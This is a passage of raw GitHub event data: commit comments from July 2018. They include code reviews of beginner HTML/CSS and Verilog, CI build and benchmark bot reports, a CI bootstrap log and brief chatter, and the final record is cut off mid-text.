{"id":"7931875441","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628671,"position":null,"line":null,"path":null,"commit_id":"bfb5e7670bf35b0559472163134c37a5363468bd","created_at":"2018-07-07T06:41:52Z","updated_at":"2018-07-07T06:41:52Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T06:41:52Z"}
{"id":"7931876835","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29628672,"position":null,"line":null,"path":null,"commit_id":"6014e7d9ef4d540b645c9b0ddd05f2998a03b31c","created_at":"2018-07-07T06:43:12Z","updated_at":"2018-07-07T06:43:12Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/6014e7d9ef4d540b645c9b0ddd05f2998a03b31c#commitcomment-29628242) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/cf11ac3444e9b1f9f903babef809c37fc602ffba/daily_2018_7_7/report.md). cc @ararslan"}},"created_at":"2018-07-07T06:43:12Z"}
{"id":"7931877706","type":"CommitCommentEvent","actor":{"login":"Senple"},"repo":{"name":"Senple/Bottle_Lesson"},"payload":{"comment":{"id":29628675,"position":null,"line":null,"path":null,"commit_id":"aff9b9bc6d7d3de152102e1bea347d449a2e31a8","created_at":"2018-07-07T06:43:57Z","updated_at":"2018-07-07T06:43:57Z","author_association":"OWNER","body":"絶賛練習中です。\r\nいまいち動かないところも多いので、ゆっくりと少しずつ最適化を図ります(( *´艸｀)"}},"created_at":"2018-07-07T06:43:57Z"}
{"id":"7931881351","type":"CommitCommentEvent","actor":{"login":"randy3k"},"repo":{"name":"SublimeText/UnitTesting"},"payload":{"comment":{"id":29628684,"position":null,"line":null,"path":null,"commit_id":"1502c03e2a7c2f1c91f529616b07357e3718fd84","created_at":"2018-07-07T06:47:18Z","updated_at":"2018-07-07T06:47:18Z","author_association":"MEMBER","body":"thanks, will fix soon."}},"created_at":"2018-07-07T06:47:18Z"}
{"id":"7931882621","type":"CommitCommentEvent","actor":{"login":"realies"},"repo":{"name":"supercurio/raspberrypi-linux"},"payload":{"comment":{"id":29628687,"position":null,"line":null,"path":null,"commit_id":"484b9eab8d02eaccd1475920c173fe4c126aa1e6","created_at":"2018-07-07T06:48:30Z","updated_at":"2018-07-07T06:48:30Z","author_association":"NONE","body":"Looks like something that would be useful for WM8804 users. Can the registers be pulled via a userland app or access happens only via the driver? Using the Cirrus Logic Audio Card and wonder what would be best for finding out the sample rate of the SPDIF receiver."}},"created_at":"2018-07-07T06:48:30Z"}
{"id":"7931885910","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"dimentra/html"},"payload":{"comment":{"id":29628696,"position":3,"line":3,"path":"css/per.css","commit_id":"28c158e953163b91f59f32f54488ae6f345dd2eb","created_at":"2018-07-07T06:51:35Z","updated_at":"2018-07-07T06:51:35Z","author_association":"COLLABORATOR","body":"отступы надо делать между классами:\r\n```\r\nbody {\r\n\tbackground-image: url('../img/31.jpg');\r\n}\r\n\r\nh2 {\r\n\tcolor: orange;\r\n\tmargin: 2%;\r\n\tpadding: 20px;\r\n\tfont-family: Geneva, Arial, Helvetica, sans-serif;\r\n}\r\n```"}},"created_at":"2018-07-07T06:51:35Z"}
{"id":"7931886000","type":"CommitCommentEvent","actor":{"login":"chinnuakhi"},"repo":{"name":"chinnuakhi/py_session"},"payload":{"comment":{"id":29628700,"position":1,"line":1,"path":"README.md","commit_id":"0642d57aa07fb068673d7af0ae603484df0fa0f4","created_at":"2018-07-07T06:51:40Z","updated_at":"2018-07-07T06:51:40Z","author_association":"OWNER","body":"I'm making some changes to my file"}},"created_at":"2018-07-07T06:51:40Z"}
{"id":"7931887013","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"dimentra/html"},"payload":{"comment":{"id":29628705,"position":17,"line":17,"path":"css/per.css","commit_id":"28c158e953163b91f59f32f54488ae6f345dd2eb","created_at":"2018-07-07T06:52:35Z","updated_at":"2018-07-07T06:52:35Z","author_association":"COLLABORATOR","body":"пустую строку в конце надо добавлять"}},"created_at":"2018-07-07T06:52:35Z"}
{"id":"7931888438","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"dimentra/html"},"payload":{"comment":{"id":29628708,"position":6,"line":8,"path":"per3.html","commit_id":"28c158e953163b91f59f32f54488ae6f345dd2eb","created_at":"2018-07-07T06:53:56Z","updated_at":"2018-07-07T06:53:56Z","author_association":"COLLABORATOR","body":"`bgcolor=\"62DA9A\"` это тоже лучше вынести в файл стилей"}},"created_at":"2018-07-07T06:53:56Z"}
{"id":"7931889368","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628710,"position":42,"line":42,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T06:54:47Z","updated_at":"2018-07-07T06:54:47Z","author_association":"CONTRIBUTOR","body":"this is two bits (2'b10)"}},"created_at":"2018-07-07T06:54:47Z"}
{"id":"7931889791","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628713,"position":52,"line":52,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T06:55:09Z","updated_at":"2018-07-07T06:55:09Z","author_association":"CONTRIBUTOR","body":"unused wire (tied to 0)"}},"created_at":"2018-07-07T06:55:09Z"}
{"id":"7931890152","type":"CommitCommentEvent","actor":{"login":"randy3k"},"repo":{"name":"SublimeText/UnitTesting"},"payload":{"comment":{"id":29628714,"position":null,"line":null,"path":null,"commit_id":"1502c03e2a7c2f1c91f529616b07357e3718fd84","created_at":"2018-07-07T06:55:29Z","updated_at":"2018-07-07T06:55:29Z","author_association":"MEMBER","body":"it should be fixed now."}},"created_at":"2018-07-07T06:55:29Z"}
{"id":"7931890622","type":"CommitCommentEvent","actor":{"login":"sticilface"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29628716,"position":62,"line":92,"path":"libraries/WiFi/src/WiFiClient.cpp","commit_id":"9efecc1be03a7f319df1d86b58f56ae73a6ae510","created_at":"2018-07-07T06:55:56Z","updated_at":"2018-07-07T06:55:56Z","author_association":"CONTRIBUTOR","body":"Probs should check ‘_buffer’ is not null incase fillbuffer has not been called yet. "}},"created_at":"2018-07-07T06:55:56Z"}
{"id":"7931891100","type":"CommitCommentEvent","actor":{"login":"Matze1985"},"repo":{"name":"Klaus3d3/XdripWidgetForAmazfit-Klaus"},"payload":{"comment":{"id":29628717,"position":null,"line":null,"path":null,"commit_id":"27addb68f3ecfdfb87dcfb957ccc89e1353bca78","created_at":"2018-07-07T06:56:23Z","updated_at":"2018-07-07T06:56:23Z","author_association":"CONTRIBUTOR","body":"Works great with your xDrip version, see my pictures:\r\n![1](https://user-images.githubusercontent.com/20039797/42407874-93169e4c-81c3-11e8-9a27-a359751a5162.png)\r\n![2](https://user-images.githubusercontent.com/20039797/42407876-9812e75c-81c3-11e8-8702-850ef0e2083e.png)\r\n\r\nBR"}},"created_at":"2018-07-07T06:56:23Z"}
{"id":"7931891999","type":"CommitCommentEvent","actor":{"login":"itssumitshukla"},"repo":{"name":"itssumitshukla/sample"},"payload":{"comment":{"id":29628721,"position":8,"line":8,"path":"codeplayerJquery.html","commit_id":"7ba603e029d90f1081f5e32e11229eec5130e755","created_at":"2018-07-07T06:57:17Z","updated_at":"2018-07-07T06:57:17Z","author_association":"OWNER","body":"Using way too many sources. Need to make sure whats the right js source. Tried to use local minified version but didnt comly. Had to refer to online."}},"created_at":"2018-07-07T06:57:17Z"}
{"id":"7931892530","type":"CommitCommentEvent","actor":{"login":"Ghabry"},"repo":{"name":"EasyRPG/Player"},"payload":{"comment":{"id":29628723,"position":null,"line":null,"path":null,"commit_id":"e7558fd747f6d7fa16ba60a6047593b848070636","created_at":"2018-07-07T06:57:46Z","updated_at":"2018-07-07T06:57:46Z","author_association":"MEMBER","body":"Please move this single commit in a different PR, has too many non-battle related side effects.\r\n\r\nThese functions are used almost everywhere, in the interpreter, in the item/skill scenes etc.\r\n\r\n\r\n"}},"created_at":"2018-07-07T06:57:46Z"}
{"id":"7931898135","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"joye-ramone/na-ogsr"},"payload":{"comment":{"id":29628741,"position":3,"line":50,"path":"gamedata/scripts/se_zones.script","commit_id":"f539efd75133355ab94cab32ecdba15131a8ac6f","created_at":"2018-07-07T07:02:16Z","updated_at":"2018-07-07T07:02:16Z","author_association":"OWNER","body":"Да, буду смотреть сегодня"}},"created_at":"2018-07-07T07:02:16Z"}
{"id":"7931898645","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628743,"position":80,"line":80,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T07:02:43Z","updated_at":"2018-07-07T07:02:43Z","author_association":"CONTRIBUTOR","body":"`always @(*)` can infer latches if you're not careful.  Good style is to set default values for everything at the top.  So, perhaps, `next_state = state;`, and `arb_addr = 32'hxxxxxxxx;`.  By adding `x` when you (think you) don't care, you can catch bugs in simulation -- and you can let the synthesis tool work more effectively."}},"created_at":"2018-07-07T07:02:43Z"}
{"id":"7931899126","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628744,"position":126,"line":126,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T07:03:07Z","updated_at":"2018-07-07T07:03:07Z","author_association":"CONTRIBUTOR","body":"`<=`"}},"created_at":"2018-07-07T07:03:07Z"}
{"id":"7931900207","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"TwilioDevEd/api-snippets"},"payload":{"comment":{"id":29628749,"position":null,"line":null,"path":null,"commit_id":"1991b5c32f8c591f6d65227e66d58fd1447385d2","created_at":"2018-07-07T07:04:05Z","updated_at":"2018-07-07T07:04:05Z","author_association":"NONE","body":"#662 "}},"created_at":"2018-07-07T07:04:05Z"}
{"id":"7931901419","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628751,"position":85,"line":85,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T07:05:07Z","updated_at":"2018-07-07T07:05:07Z","author_association":"CONTRIBUTOR","body":"Also, feeding an external signal like `arb_addr` a combinatorial value is kind of sketch, unless you know that the arb always flops its inputs.  It can cause timing problems elsewhere.  Maybe better to have a `next_arb_addr` that gets flopped at the same time as `arb_valid`.  (Maybe this state machine also wants to generate a `next_arb_valid` signal, encapsulating some of the logic in the next sequential `always` block below?)"}},"created_at":"2018-07-07T07:05:07Z"}
{"id":"7931901977","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628753,"position":122,"line":122,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T07:05:34Z","updated_at":"2018-07-07T07:05:34Z","author_association":"CONTRIBUTOR","body":"Unconditionally pushing that state machine along causes problems if the arb pushes back, right?"}},"created_at":"2018-07-07T07:05:34Z"}
{"id":"7931902110","type":"CommitCommentEvent","actor":{"login":"Klaus3d3"},"repo":{"name":"Klaus3d3/XdripWidgetForAmazfit-Klaus"},"payload":{"comment":{"id":29628754,"position":null,"line":null,"path":null,"commit_id":"27addb68f3ecfdfb87dcfb957ccc89e1353bca78","created_at":"2018-07-07T07:05:42Z","updated_at":"2018-07-07T07:05:42Z","author_association":"OWNER","body":"I'm constantly working on it. So there come changes from time to time.\r\nI still have trouble to find the right place in xDrip+ to trigger the watch upload.\r\nEgg the prediction text is not reliable. I think this is a timing issue. The prediction text on the home screen of the phone gets calculated on new data. I have to find the right spot.\r\nNext steps is fixing this and adding a graph and snooze dialog. "}},"created_at":"2018-07-07T07:05:42Z"}
{"id":"7931902550","type":"CommitCommentEvent","actor":{"login":"mrbugs55"},"repo":{"name":"mrbugs55/test"},"payload":{"comment":{"id":29628757,"position":null,"line":null,"path":null,"commit_id":"ef845475f5e878351cb29706959ed0c8ffa5a476","created_at":"2018-07-07T07:06:07Z","updated_at":"2018-07-07T07:06:07Z","author_association":"OWNER","body":"123123"}},"created_at":"2018-07-07T07:06:07Z"}
{"id":"7931903315","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628758,"position":132,"line":132,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T07:06:47Z","updated_at":"2018-07-07T07:06:47Z","author_association":"CONTRIBUTOR","body":"I kind of feel like I would just store the whole PDE in a `[31:0]` and then do the part-selects on the stored PDE, rather than on the rdata, but it doesn't actually matter.\r\n\r\n(Also, <=.)"}},"created_at":"2018-07-07T07:06:47Z"}
{"id":"7931904382","type":"CommitCommentEvent","actor":{"login":"jgirardet"},"repo":{"name":"SublimeText/UnitTesting"},"payload":{"comment":{"id":29628759,"position":null,"line":null,"path":null,"commit_id":"1502c03e2a7c2f1c91f529616b07357e3718fd84","created_at":"2018-07-07T07:07:43Z","updated_at":"2018-07-07T07:07:43Z","author_association":"NONE","body":"quite :crossed_fingers: \r\n```\r\nDownloading appveyor.ps1 (1,271 bytes)...100%\r\n.\\appveyor.ps1 \"bootstrap\" -verbose\r\n[UnitTesting] bootstrapping environment...\r\nVERBOSE: GET https://raw.githubusercontent.com/SublimeText/UnitTesting/master/sbin/ps/ci_config.ps1 with 0-byte payload\r\nVERBOSE: received 2944-byte response of content type text/plain; charset=utf-8\r\nVERBOSE: GET https://raw.githubusercontent.com/SublimeText/UnitTesting/master/sbin/ps/utils.ps1 with 0-byte payload\r\nVERBOSE: received 3841-byte response of content type text/plain; charset=utf-8\r\nVERBOSE: GET https://raw.githubusercontent.com/SublimeText/UnitTesting/master/sbin/ps/ci.ps1 with 0-byte payload\r\nVERBOSE: received 4529-byte response of content type text/plain; charset=utf-8\r\nVERBOSE: [UnitTesting] setting global constants and variables...\r\nVERBOSE: [UnitTesting] creating directory junction to package under test at C:\\st\\Data\\Packages\\sublack...\r\nJunction created for C:\\st\\Data\\Packages\\sublack <<===>> .\r\nVERBOSE: [UnitTesting] download UnitTesting tag: 1.3.4\r\nfatal: repository 'UnitTestingRepositoryUrl' does not exist\r\n```"}},"created_at":"2018-07-07T07:07:43Z"}
{"id":"7931904881","type":"CommitCommentEvent","actor":{"login":"jianjian123789"},"repo":{"name":"jianjian123789/01days_github_learning"},"payload":{"comment":{"id":29628761,"position":null,"line":null,"path":null,"commit_id":"9f0a886df1d449cdba94ccf72cb5f790b0270e9c","created_at":"2018-07-07T07:08:11Z","updated_at":"2018-07-07T07:08:11Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-07T07:08:11Z"}
{"id":"7931905816","type":"CommitCommentEvent","actor":{"login":"santi351"},"repo":{"name":"santi351/DesarrolloWeb-Matias-Castillo"},"payload":{"comment":{"id":29628764,"position":null,"line":null,"path":null,"commit_id":"52fc9927dd5b25895c6cd4eac8851625c25c1483","created_at":"2018-07-07T07:09:07Z","updated_at":"2018-07-07T07:09:07Z","author_association":"OWNER","body":"cbnm"}},"created_at":"2018-07-07T07:09:07Z"}
{"id":"7931905945","type":"CommitCommentEvent","actor":{"login":"Klaus3d3"},"repo":{"name":"Klaus3d3/XdripWidgetForAmazfit-Klaus"},"payload":{"comment":{"id":29628765,"position":null,"line":null,"path":null,"commit_id":"27addb68f3ecfdfb87dcfb957ccc89e1353bca78","created_at":"2018-07-07T07:09:13Z","updated_at":"2018-07-07T07:09:13Z","author_association":"OWNER","body":"And i'm hoping to find a way to wake up the watch in case of an alarm. "}},"created_at":"2018-07-07T07:09:13Z"}
{"id":"7931906021","type":"CommitCommentEvent","actor":{"login":"mgillieron"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29628766,"position":null,"line":null,"path":null,"commit_id":"3d00e8c7bb077adce9445212f785b79d0a906230","created_at":"2018-07-07T07:09:17Z","updated_at":"2018-07-07T07:09:17Z","author_association":"NONE","body":"@AR98 first remove the text in \"Directory name\" input, then type 820 in \"Screen width\" input. Normally, \"Directory name\" will be filled automatically."}},"created_at":"2018-07-07T07:09:17Z"}
{"id":"7931906352","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29628767,"position":125,"line":125,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-07T07:09:36Z","updated_at":"2018-07-07T07:09:36Z","author_association":"CONTRIBUTOR","body":"Mixing behavior based on transitions vs. based on states is a little confusing.  I think a bunch of this could be turned into signals from the state machine itself, that produce a control map for some data path."}},"created_at":"2018-07-07T07:09:36Z"}
{"id":"7931906826","type":"CommitCommentEvent","actor":{"login":"foujeyafariha880"},"repo":{"name":"wozz2do/-La-SinMiedo---Fusi-n-G-nero-y-Cultura"},"payload":{"comment":{"id":29628769,"position":null,"line":null,"path":null,"commit_id":"1c3231262d649b4079c25a072a06364e5105363f","created_at":"2018-07-07T07:10:05Z","updated_at":"2018-07-07T07:10:05Z","author_association":"CONTRIBUTOR","body":"Espacio-Fusión de encuentro Social y Cultural con perspectiva de Género.\r\nThis is a page created by Blindly, Mely airbrushes. Its purpose is to raise funds to donate to associations such as breast or childhood cancer **_[divernis](url=\r\n\r\nhttps://www.wozz2do.com/offer-view/connecting-divernis-spa\r\n--\r\n)_**\r\n."}},"created_at":"2018-07-07T07:10:05Z"}
{"id":"7931907001","type":"CommitCommentEvent","actor":{"login":"ekasnh"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29628770,"position":null,"line":null,"path":null,"commit_id":"c4efd77bd8ad33eda5e54e6d0159b07e0d4edd71","created_at":"2018-07-07T07:10:13Z","updated_at":"2018-07-07T07:10:13Z","author_association":"CONTRIBUTOR","body":"Hmmn"}},"created_at":"2018-07-07T07:10:13Z"}
{"id":"7931907028","type":"CommitCommentEvent","actor":{"login":"saifnazam"},"repo":{"name":"mgp25/WART"},"payload":{"comment":{"id":29628771,"position":null,"line":null,"path":null,"commit_id":"c639e6ed1e180e292608545f0acc73eb2de9ab52","created_at":"2018-07-07T07:10:15Z","updated_at":"2018-07-07T07:10:15Z","author_association":"NONE","body":"hi"}},"created_at":"2018-07-07T07:10:15Z"}
{"id":"7931907327","type":"CommitCommentEvent","actor":{"login":"AmedeeBulle"},"repo":{"name":"PaulNeumann/vagrant-boxes"},"payload":{"comment":{"id":29628772,"position":6,"line":24,"path":"OracleDatabase/12.2.0.1/Vagrantfile","commit_id":"b86d0d2e1083a4a896935c1a7f83af9e3be3b105","created_at":"2018-07-07T07:10:30Z","updated_at":"2018-07-07T07:10:30Z","author_association":"NONE","body":"Looks good to me"}},"created_at":"2018-07-07T07:10:30Z"}
{"id":"7931907822","type":"CommitCommentEvent","actor":{"login":"nabeelomer"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29628773,"position":null,"line":null,"path":null,"commit_id":"c4efd77bd8ad33eda5e54e6d0159b07e0d4edd71","created_at":"2018-07-07T07:10:57Z","updated_at":"2018-07-07T07:10:57Z","author_association":"MEMBER","body":"I asked my publicist before doing it."}},"created_at":"2018-07-07T07:10:57Z"}
{"id":"7931908091","type":"CommitCommentEvent","actor":{"login":"nabeelomer"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29628774,"position":null,"line":null,"path":null,"commit_id":"c4efd77bd8ad33eda5e54e6d0159b07e0d4edd71","created_at":"2018-07-07T07:11:11Z","updated_at":"2018-07-07T07:11:11Z","author_association":"MEMBER","body":"In fact she suggested it."}},"created_at":"2018-07-07T07:11:11Z"}
{"id":"7931909766","type":"CommitCommentEvent","actor":{"login":"Zlika"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29628780,"position":null,"line":null,"path":null,"commit_id":"36a3ba61c7af3d63354972c18cfb7bd91aeadf8a","created_at":"2018-07-07T07:12:44Z","updated_at":"2018-07-07T07:12:44Z","author_association":"OWNER","body":"I know, I'm on it. PS3 build seems to be fixed, but the windows builds still fail because of missing C99 header files."}},"created_at":"2018-07-07T07:12:44Z"}
{"id":"7931911675","type":"CommitCommentEvent","actor":{"login":"sulinye"},"repo":{"name":"sulinye/sulinye.github.io"},"payload":{"comment":{"id":29628786,"position":17,"line":17,"path":"index.md","commit_id":"681bbe6449392da4049fddac9d369a328f93df32","created_at":"2018-07-07T07:14:28Z","updated_at":"2018-07-07T07:14:28Z","author_association":"OWNER","body":"header 4"}},"created_at":"2018-07-07T07:14:28Z"}
{"id":"7931912899","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"alekseyspjsb/lesson5"},"payload":{"comment":{"id":29628790,"position":9,"line":9,"path":"index.html","commit_id":"3892e8bd608d77ae84ee276580fd92865fa06670","created_at":"2018-07-07T07:15:32Z","updated_at":"2018-07-07T07:15:32Z","author_association":"COLLABORATOR","body":"форматирование съехало\r\n```\r\n<div><a href=\"page2.html\">Photos and Videos</a></div>\r\n\t<div><a href=\"page3.html\">Table and lists</a></div>\r\n```"}},"created_at":"2018-07-07T07:15:32Z"}
{"id":"7931913156","type":"CommitCommentEvent","actor":{"login":"htor"},"repo":{"name":"keystonejs/keystone"},"payload":{"comment":{"id":29628791,"position":null,"line":null,"path":null,"commit_id":"8f5c76f6533875d441605341f7956fc15fde145d","created_at":"2018-07-07T07:15:48Z","updated_at":"2018-07-07T07:15:48Z","author_association":"NONE","body":"awesome!"}},"created_at":"2018-07-07T07:15:48Z"}
{"id":"7931913852","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"alekseyspjsb/lesson5"},"payload":{"comment":{"id":29628793,"position":13,"line":13,"path":"index.html","commit_id":"3892e8bd608d77ae84ee276580fd92865fa06670","created_at":"2018-07-07T07:16:26Z","updated_at":"2018-07-07T07:16:26Z","author_association":"COLLABORATOR","body":"круто что комментарий добавил"}},"created_at":"2018-07-07T07:16:26Z"}
{"id":"7931914392","type":"CommitCommentEvent","actor":{"login":"AlekseyMy"},"repo":{"name":"Ctepan/OGL-2"},"payload":{"comment":{"id":29628794,"position":null,"line":null,"path":null,"commit_id":"045b11987f5ab8943c83956b61383c5c3d94df8b","created_at":"2018-07-07T07:16:58Z","updated_at":"2018-07-07T07:16:58Z","author_association":"NONE","body":"Вот и договорились."}},"created_at":"2018-07-07T07:16:58Z"}
{"id":"7931915676","type":"CommitCommentEvent","actor":{"login":"stevanusandrianta"},"repo":{"name":"bhayangkara0707/palapa-be"},"payload":{"comment":{"id":29628797,"position":null,"line":null,"path":null,"commit_id":"2392d3605196cb607ed50e76b7d003a2d9fbbc9c","created_at":"2018-07-07T07:18:17Z","updated_at":"2018-07-07T07:18:17Z","author_association":"NONE","body":"i think it is okay for POC,\nThe change of having same UUID is extremely low\n\nhttps://stackoverflow.com/questions/1155008/how-unique-is-uuid\n\nLet's neglect it and focus on something else :p\n\nOn Sat, Jul 7, 2018 at 1:25 PM Misbach Imaduddin Zuhdi <\nnotifications@github.com> wrote:\n\n> gw coba pakai uuid, karena ketika coba baca2 di\n> https://en.wikipedia.org/wiki/Universally_unique_identifier#Random_UUID_probability_of_duplicates\n> dikatakan While the probability that a UUID will be duplicated is not\n> zero, it is close enough to zero to be negligible.\n>\n> how @stevanusandrianta <https://github.com/stevanusandrianta> ?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bhayangkara0707/palapa-be/commit/2392d3605196cb607ed50e76b7d003a2d9fbbc9c#commitcomment-29628623>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQulodxGAqpOb2xGYeX0T3b3Z_py-T2sks5uEFRTgaJpZM4VGP1r>\n> .\n>\n"}},"created_at":"2018-07-07T07:18:17Z"}
{"id":"7931916695","type":"CommitCommentEvent","actor":{"login":"MarcelWaldvogel"},"repo":{"name":"jsxc/jsxc"},"payload":{"comment":{"id":29628798,"position":15,"line":1367,"path":"src/jsxc.lib.muc.js","commit_id":"abcf3e6027099c3c8d1304de09b112ded606f16a","created_at":"2018-07-07T07:19:18Z","updated_at":"2018-07-07T07:19:18Z","author_association":"CONTRIBUTOR","body":"i.e., if some other client sends body+attachment, then only the attachment will be shown in 3.x?"}},"created_at":"2018-07-07T07:19:18Z"}
{"id":"7931917376","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"alekseyspjsb/lesson5"},"payload":{"comment":{"id":29628799,"position":47,"line":47,"path":"index.html","commit_id":"3892e8bd608d77ae84ee276580fd92865fa06670","created_at":"2018-07-07T07:19:58Z","updated_at":"2018-07-07T07:19:58Z","author_association":"COLLABORATOR","body":"чтобы не было красного символа на гитхабе, всегда добавляем пустую строку в конце"}},"created_at":"2018-07-07T07:19:58Z"}
{"id":"7931918276","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"alekseyspjsb/lesson5"},"payload":{"comment":{"id":29628802,"position":5,"line":5,"path":"page2.html","commit_id":"3892e8bd608d77ae84ee276580fd92865fa06670","created_at":"2018-07-07T07:20:47Z","updated_at":"2018-07-07T07:20:47Z","author_association":"COLLABORATOR","body":"тут еще можно добавить тэги keywords и description, они хороши для индексации сайта поисковыми системами"}},"created_at":"2018-07-07T07:20:47Z"}
{"id":"7931918788","type":"CommitCommentEvent","actor":{"login":"ekasnh"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29628803,"position":null,"line":null,"path":null,"commit_id":"c4efd77bd8ad33eda5e54e6d0159b07e0d4edd71","created_at":"2018-07-07T07:21:13Z","updated_at":"2018-07-07T07:21:13Z","author_association":"CONTRIBUTOR","body":"Logo part doesn't look goos"}},"created_at":"2018-07-07T07:21:13Z"}
{"id":"7931918923","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TipsyOs/vendor_tipsy"},"payload":{"comment":{"id":29628804,"position":null,"line":null,"path":null,"commit_id":"477c97d463eb55f2b96621c7f9d9ee6608047094","created_at":"2018-07-07T07:21:21Z","updated_at":"2018-07-07T07:21:21Z","author_association":"MEMBER","body":":beer: "}},"created_at":"2018-07-07T07:21:21Z"}
{"id":"7931919837","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29628805,"position":null,"line":null,"path":null,"commit_id":"25f9ad026123a728257530bc7b78eddee4a4a2cb","created_at":"2018-07-07T07:22:11Z","updated_at":"2018-07-07T07:22:11Z","author_association":"COLLABORATOR","body":"Puzzle `1269-a1c2eb54` discovered in   [`src/main/java/com/zerocracy/radars/github/RbRelease.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/radars/github/RbRelease.java)   and submitted as #1366. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-07T07:22:11Z"}
{"id":"7931920769","type":"CommitCommentEvent","actor":{"login":"mastermouses"},"repo":{"name":"mastermouses/Discord1"},"payload":{"comment":{"id":29628810,"position":null,"line":null,"path":null,"commit_id":"bc309ae343c44bb51504c0a4fa352cfb4ca63fc9","created_at":"2018-07-07T07:22:58Z","updated_at":"2018-07-07T07:22:58Z","author_association":"OWNER","body":"check out the fb page too! https://www.facebook.com/VerySmallSS"}},"created_at":"2018-07-07T07:22:58Z"}
{"id":"7931921535","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"alekseyspjsb/lesson5"},"payload":{"comment":{"id":29628815,"position":11,"line":11,"path":"page2.html","commit_id":"3892e8bd608d77ae84ee276580fd92865fa06670","created_at":"2018-07-07T07:23:41Z","updated_at":"2018-07-07T07:23:41Z","author_association":"COLLABORATOR","body":"здесь тоже с отступами не правильно. Это должно выглядеть так:\r\n```\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <title>Page 2</title>\r\n  <meta charset=\"utf-8\">\r\n  <!-- \t<script type=\"text/javascript\"></script> -->\r\n</head>\r\n<body>\r\n  <h2>Links</h2>\r\n  <div><a href=\"index.html\">Home page</a></div>\r\n  <div><a href=\"page3.html\">Table and Lists</a></div>\r\n  <div>My city is Moscow</div>\r\n  <div>I live in North, <span>it is good place</span> ever </div>\r\n  <img src=\"lemons.jpg\" width=\"300\" title =\"Лимоны\" alt=\"Лимоны\">\r\n  <br>\r\n  <img src=\"img/orange.jpg\" width=\"300\" title =\"Апельсины\" alt=\"Апельсины\">\r\n  <div> <img 